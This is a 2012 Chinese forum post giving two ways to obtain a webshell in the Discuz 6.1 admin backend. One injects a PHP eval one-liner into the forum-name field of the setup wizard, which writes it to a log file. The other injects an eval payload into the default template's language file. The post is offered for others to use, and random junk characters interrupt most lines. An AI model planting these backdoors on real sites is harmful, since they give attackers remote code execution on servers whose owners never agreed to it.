discuz6.1两种方法后台拿shell, ^7 ^" B+ F5 i9 X4 b8 ~/ i; D, v3 c
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下$ n& H# U6 h: ~9 }4 A8 b
1:
+ ^! Q0 ~" u2 Rhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes! u5 G% l& r {7 z8 T) V9 G
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell% U4 R7 o1 f+ v5 P' {
<?php eval($_POST[cmd]);?>3 s& c8 }2 t# x1 y2 Y U* O
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php2 S4 c! {) Y7 {2 L) \# \" y0 d
4 n$ u6 M/ Z% O, {- x" n7 O$ W% J! w+ J: I5 j$ C
2:后台模板管理--默认模板套系--详情, O! W. k% c: q9 c9 Y: k: u
templates/default/actions.lang.php
+ n; G% V. O1 z3 B) e" ljhackj\\');eval($_POST[cmd])?>;//
/ }; [+ G Z+ p3 d" P2 R2 ^$ S' v6 d+ U) Y% w& u
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对